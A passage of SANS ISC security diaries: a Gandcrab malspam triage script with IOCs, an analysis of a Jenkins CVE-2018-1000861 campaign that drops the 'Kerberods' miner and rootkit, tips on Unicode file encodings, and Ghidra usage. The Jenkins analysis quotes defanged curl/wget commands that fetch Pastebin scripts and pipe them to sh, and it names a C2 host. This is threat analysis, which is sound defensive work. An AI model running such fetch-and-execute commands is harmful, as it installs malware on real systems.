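    return str(make_header(decode_header(raw)))


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def classify(data: bytes) -> str:
    for magic, label in MAGICS.items():
        if data.startswith(magic):
            return label
    return "unknown"


def triage_eml(raw: bytes) -> list:
    """Return one record per attachment: decoded name, size, SHA256 and type."""
    msg = email.message_from_bytes(raw)   # compat32 policy keeps encoded words raw
    results = []
    for part in msg.walk():
        if part.get_content_maintype() == "multipart":
            continue
        name = part.get_filename()
        if not name:
            continue
        payload = part.get_payload(decode=True) or b""
        results.append({
            "filename": decode_filename(name),
            "size": len(payload),
            "sha256": sha256_hex(payload),
            "type": classify(payload),
        })
    return results


# Constructed sample: a Korean filename encoded the way the diary describes,
# and a payload that is only the 7z signature followed by filler bytes.
SAMPLE_NAME = "견적서.7z"
SAMPLE_PAYLOAD = b"7z\xbc\xaf\x27\x1c" + b"\x00" * 26


def build_sample_eml() -> bytes:
    encoded_name = "=?utf-8?B?" + base64.b64encode(SAMPLE_NAME.encode("utf-8")).decode("ascii") + "?="
    body = base64.b64encode(SAMPLE_PAYLOAD).decode("ascii")
    return (
        "From: sender@example.invalid\r\n"
        "To: victim@example.invalid\r\n"
        "Subject: constructed sample\r\n"
        "MIME-Version: 1.0\r\n"
        'Content-Type: multipart/mixed; boundary="b1"\r\n'
        "\r\n--b1\r\n"
        "Content-Type: text/plain\r\n\r\nsee attachment\r\n"
        "--b1\r\n"
        'Content-Type: application/octet-stream; name="%s"\r\n'
        "Content-Transfer-Encoding: base64\r\n"
        'Content-Disposition: attachment; filename="%s"\r\n\r\n%s\r\n--b1--\r\n'
        % (encoded_name, encoded_name, body)
    ).encode("utf-8")


if __name__ == "__main__":
    for record in triage_eml(build_sample_eml()):
        print(record)
```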

Indicators

The following are indicators associated with this infection:

SHA256 hash: 39f97e750a8ebcc68a5392584c9fd8edc934e978d6495d3ae430cb7ee3275ffe

  • File size: 157,810 bytes
  • File description: Example of Korean malspam (.eml file) pushing Gandcrab

SHA256 hash: 5444841becddce7ef2601752df63db2a9d067d46a359d8b0288da2ebf494ff41

  • File size: 112,792 bytes
  • File description: 7-zip archive (.7z file) attached to Korean malspam

SHA256 hash: df53498804b4e7dbfb884a91df7f8b371de90d6908640886f929528f1d6bd0cc

  • File size: 173,568 bytes
  • File description: Gandcrab executables (.exe files) extracted from the above .7z archive
  • Any.Run sandbox analysis

Final words

This round of email roulette gave us a Gandcrab ransomware infection.  What type of malware might I find next?  Perhaps we'll know when I try this again next month for another diary.

---
Brad Duncan
brad [at] malware-traffic-analysis.net

8 May 2019

Vulnerable Apache Jenkins exploited in the wild, (Tue, May 7th)

An ongoing malicious campaign is looking for vulnerable Apache Jenkins installations to deploy a Monero cryptominer. The dropper uses sophisticated techniques to hide its presence on the system, to move laterally and to look for new victims on the internet. It also downloads and runs the miner software, of course.

The exploited vulnerability, CVE-2018-1000861 [1], was published in December 2018. It affects the Stapler web framework used by Jenkins 2.153 and earlier, and may allow attackers to invoke methods on Java objects by accessing crafted URLs.

Looking for publicly available exploits for this vulnerability, I could find a detailed proof of concept published early March this year.

After analyzing the threat that attacked one of my honeypots, I created the diagram shown in the picture below. Follow the numbers in blue to understand each step.

Vulnerability Exploitation

In the picture below, you can see the exploitation occurring.

Notice that there is base64-encoded content piped to bash for execution. Decoding this content, it was possible to see that this campaign uses Pastebin as its C2:

(curl -fsSL hxxps://pastebin[.]com/raw/wDBa7jCQ||wget -q -O- hxxps://pastebin[.]com/raw/wDBa7jCQ)|sh

The content of the paste 'wDBa7jCQ' is no longer available, but it was another paste:

(curl -fsSL hxxps://pastebin[.]com/raw/D8E71JBJ||wget -q -O- hxxps://pastebin[.]com/raw/D8E71JBJ)|sed 's/\r//'|sh

The content of the 'D8E71JBJ' paste is no longer available either, but it was the shell script shown in the following images.

The Dropper

The dropper, named "Kerberods" (not "Kerberos" like the protocol), caught my attention due to the way it is packed and the way it acts if it has 'root' privileges on the machine.

After analyzing the binary, I could see that the packer used was a custom version of 'UPX'. UPX is open source software and there are many ways it can be modified to make unpacking with a regular UPX version hard. There is a great presentation on this subject by @unixfreaxjp [2] called 'Unpacking the non-unpackable', which shows different ways to fix ELF headers in order to unpack such files.

Fortunately, in this case, the UPX customization consisted only of changing the magic constant UPX_MAGIC_LE32 from 'UPX' to three other letters. Thus, after reverting it to UPX in the different parts of the binary, it was possible to unpack the binary with the regular version of UPX.
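The repair described above can be scripted. As an added example (not the diary's own tool), the block below looks for a three-letters-plus-'!' tag that recurs in an ELF file where stock UPX would write its 'UPX!' magic (the l_info header of the stub and the PackHeader trailer), and rewrites it back so a regular UPX build can unpack the sample; the ELF-like input with the made-up tag 'QWE!' is constructed here and is not the real dropper.

```python
"""Find and restore a customised UPX magic so a sample can be unpacked with
stock UPX. UPX_MAGIC_LE32 is 0x21585055, i.e. the bytes 'UPX!', and stock
UPX writes it in more than one place, which is what the recurrence check
below relies on.
"""
import re
from collections import Counter

UPX_MAGIC = b"UPX!"
TAG_RE = re.compile(rb"[A-Za-z0-9]{3}!")


def is_elf(data: bytes) -> bool:
    return data[:4] == b"\x7fELF"


def find_custom_magics(data: bytes, min_hits: int = 2) -> list:
    """Return candidate magics, most frequent first; stock 'UPX!' wins if present."""
    if UPX_MAGIC in data:
        return [UPX_MAGIC]
    counts = Counter(m.group(0) for m in TAG_RE.finditer(data))
    return [tag for tag, n in counts.most_common() if n >= min_hits]


def restore_upx_magic(data: bytes, custom: bytes) -> bytes:
    """Rewrite every occurrence of the custom tag to the stock magic."""
    if len(custom) != 4 or not custom.endswith(b"!"):
        raise ValueError("magic must be three characters followed by '!'")
    return data.replace(custom, UPX_MAGIC)


def repair(data: bytes) -> tuple:
    """Return (repaired bytes, tag that was replaced or None if nothing to do)."""
    if not is_elf(data):
        raise ValueError("not an ELF file")
    candidates = find_custom_magics(data)
    if not candidates or candidates[0] == UPX_MAGIC:
        return data, None
    return restore_upx_magic(data, candidates[0]), candidates[0]


# Constructed stand-in for a repacked ELF: a real ELF ident, filler, and the
# made-up tag 'QWE!' at the two places stock UPX would have written 'UPX!'.
SAMPLE = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 57            # ELF64 ident/header filler
    + b"\x00" * 100 + b"\xcc\xcc\xcc\xcc" + b"QWE!"    # l_info: checksum, magic
    + b"\x0d\x00\x0d\x0c"
    + b"compressed payload goes here..." * 4
    + b"QWE!" + b"\x00" * 28                            # PackHeader trailer
)

if __name__ == "__main__":
    fixed, tag = repair(SAMPLE)
    print("replaced", tag, "->", UPX_MAGIC, "occurrences:", fixed.count(UPX_MAGIC))
```

Inspect the candidate list before writing the file back; a tag that happens to occur twice in a string table would also pass the recurrence check.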

The Glibc hooks

The other interesting part is the way 'Kerberods' acts to persist and hide itself if it has root privileges on the machine.

If that is the case, it drops, compiles and loads a library into the operating system that hooks different Glibc functions to modify their behavior. In other words, it acts like a rootkit.

In the image below it is possible to see that the function 'open' will now check for some strings in the 'pathname' and act differently. The intention is to prevent anyone (including root) from opening the binary 'khugepageds', which is the cryptominer; 'ld.so.preload', which is the file that loads the malicious library; and the library 'libpamcd.so' itself.

 

Another hook, to show one more example, hides the network connection to the private mining pool and the scan for open Redis servers, as seen in the image below.


 

Indicators of Compromise (IOCs)

Filesystem
74becf0d1621ba1f036025cddffc46d4236530d54d1f913a4d0ad488099913c8
Bab27f611518dc55b00b1a9287bdb8e059c4f4cc1607444f40e0c45d5842994f
43a00e0dd57d110d1c88b18234185267ca2a79f8ae1905bef4ba225144c992d2

Network
SYSTEMTEN[.]ORG:51640

--
Renato Marinho
Morphus Labs | LinkedIn | Twitter

7 May 2019

ISC Stormcast For Tuesday, May 7th 2019 https://isc.sans.edu/podcastdetail.html?id=6486, (Tue, May 7th)

6 May 2019

Text and T<NUL>e<NUL>x<NUL>t<NUL>, (Mon, May 6th)

I gave a few tips over the last few weeks to help friends with processing files. It turned out that each time, UNICODE was involved.

Xavier had an issue with a malicious UDF file. I took a look with a binary editor:

The first bytes, FF FE, reminded me of a BOM: a Byte Order Mark. FF FE or FE FF can be found at the start of UTF-16 text files and indicate the endianness: little endian (screenshot) or big endian.

The file command confirmed the endianness:

The fact that it contains null bytes is unusual, but then again, this is actually not a text file but a UDF file that was probably opened and saved with a text editor.

Another friend had a problem getting an XML file parsed by a SIEM. It threw an unusual, obscure error. It turned out that here too, the file was UNICODE, while the SIEM expected an ASCII file.

When opening text files with an editor, it's often not trivial to determine the encoding of the file. And not everyone is comfortable using a hexadecimal editor.

If you want a command-line tool, I recommend the file command.

For a GUI tool on Windows, you can use the free text editor Notepad++.

It displays the encoding of the displayed file in its status bar:

"LE BOM" tells us that the file contains a BOM and is little endian. UCS-2 is an ISO standard equivalent to UNICODE and the basis for UTF-16. And we get bonus information: the line separator is carriage return / line feed (CR LF). This was something Xavier had to deal with too.

This editor can of course convert encodings:

 
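The same checks that the file command and Notepad++ perform can be scripted, which helps when a pipeline such as the SIEM above has to accept files of unknown encoding. As an added example (not the diary's code), the block below sniffs the BOM (FF FE, FE FF, EF BB BF and the UTF-32 forms), falls back to the every-other-byte-is-null pattern for BOM-less UTF-16, reports the line separator, and converts the blob to BOM-less UTF-8 with LF line endings; the UTF-16 and ASCII samples are constructed in the block.

```python
"""Identify the encoding of a text blob the way the diary does by hand (BOM,
null-byte pattern, line separator) and normalise it to UTF-8 for tools that
expect ASCII/UTF-8 input.
"""
import codecs

# Order matters: FF FE 00 00 (UTF-32 LE) must be tested before FF FE (UTF-16 LE).
BOMS = [
    (codecs.BOM_UTF32_LE, "utf-32-le"),
    (codecs.BOM_UTF32_BE, "utf-32-be"),
    (codecs.BOM_UTF16_LE, "utf-16-le"),   # FF FE
    (codecs.BOM_UTF16_BE, "utf-16-be"),   # FE FF
    (codecs.BOM_UTF8, "utf-8-sig"),       # EF BB BF
]
BOM_CODECS = {name for _, name in BOMS}


def to_text(data: bytes, encoding: str) -> str:
    """Decode, dropping the BOM ourselves where the codec would keep it."""
    if encoding in BOM_CODECS and encoding != "utf-8-sig":
        for marker, name in BOMS:
            if name == encoding and data.startswith(marker):
                data = data[len(marker):]
    return data.decode(encoding)


def sniff_encoding(data: bytes) -> dict:
    """Return {'encoding', 'bom', 'newline'} for a text blob."""
    encoding, bom = None, None
    for marker, name in BOMS:
        if data.startswith(marker):
            encoding, bom = name, marker
            break
    if encoding is None:
        sample = data[:4096]
        half = len(sample) // 2
        if half:
            # BOM-less UTF-16 of ASCII-range text has a null in every other byte.
            odd_nulls = sample[1::2].count(0)
            even_nulls = sample[0::2].count(0)
            if odd_nulls >= 0.9 * half and even_nulls < 0.1 * half:
                encoding = "utf-16-le"
            elif even_nulls >= 0.9 * half and odd_nulls < 0.1 * half:
                encoding = "utf-16-be"
    if encoding is None:
        for candidate in ("ascii", "utf-8"):
            try:
                data.decode(candidate)
                encoding = candidate
                break
            except UnicodeDecodeError:
                continue
        else:
            encoding = "unknown"
    text = to_text(data, encoding) if encoding != "unknown" else ""
    if "\r\n" in text:
        newline = "CRLF"
    elif "\n" in text:
        newline = "LF"
    elif "\r" in text:
        newline = "CR"
    else:
        newline = "none"
    return {"encoding": encoding, "bom": bom, "newline": newline}


def convert_to_utf8(data: bytes) -> bytes:
    """Normalise any recognised encoding to BOM-less UTF-8 with LF line endings."""
    info = sniff_encoding(data)
    if info["encoding"] == "unknown":
        raise ValueError("encoding not recognised")
    text = to_text(data, info["encoding"]).replace("\r\n", "\n")
    return text.encode("utf-8")


# Constructed samples: the same XML fragment as UTF-16 LE with BOM and CRLF
# (the kind of file the SIEM rejected) and as plain ASCII with LF.
SAMPLE_UTF16 = codecs.BOM_UTF16_LE + '<event id="1"/>\r\n'.encode("utf-16-le")
SAMPLE_ASCII = b'<event id="1"/>\n'

if __name__ == "__main__":
    print(sniff_encoding(SAMPLE_UTF16))
    print(convert_to_utf8(SAMPLE_UTF16))
```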

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

6 May 2019

ISC Stormcast For Monday, May 6th 2019 https://isc.sans.edu/podcastdetail.html?id=6484, (Sun, May 5th)

3 May 2019

A few Ghidra tips for IDA users, part 3 - conversion, labels, and comments, (Fri, May 3rd)

In this entry in my series, I'll look at a few more of the features I regularly use in IDA and how to accomplish the same in Ghidra.

The first one is simple conversion, in this case hex to ASCII characters (classic stack strings stuff that we cover in Day 5 of FOR610). I miss IDA's 'R' key mapping, but in Ghidra that key is currently taken by View/Edit References From. You can change that or create your own key mapping; Ctrl-Alt-R isn't currently taken, so that's what I use. Just like in IDA, you can right-click on the value, but then you have to choose Convert and then Char from the submenu.

Another feature I use regularly is renaming arguments, variables, and functions as I begin to figure out their purposes. In IDA, this is the 'N' key; in Ghidra, it is the 'L' key for Label. It works exactly like in IDA. In the screenshot below, you'll see it in the right-click menu.

And below is the actual dialog to do the renaming.

And the last functionality I want to cover in this post is comments. There are 4 (well, 5) types of comments that you can create in Ghidra: pre-comments, which appear above the instruction where you place them; post-comments, which appear below; EOL (and repeatable) comments at the end of the line; and plate comments, which replace the generic "Function" comment at the top of the function. I actually like some of the additions, especially the plate comment, which can be used to record what I've discovered about the functionality of the function in question.

And here are examples of each:

I've got at least one more post in this series, probably next week. As with the others, if you have any tips, comments, corrections, etc. let me know via our contact page, e-mail, or via the comments below. Until next time,...

---------------
Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu
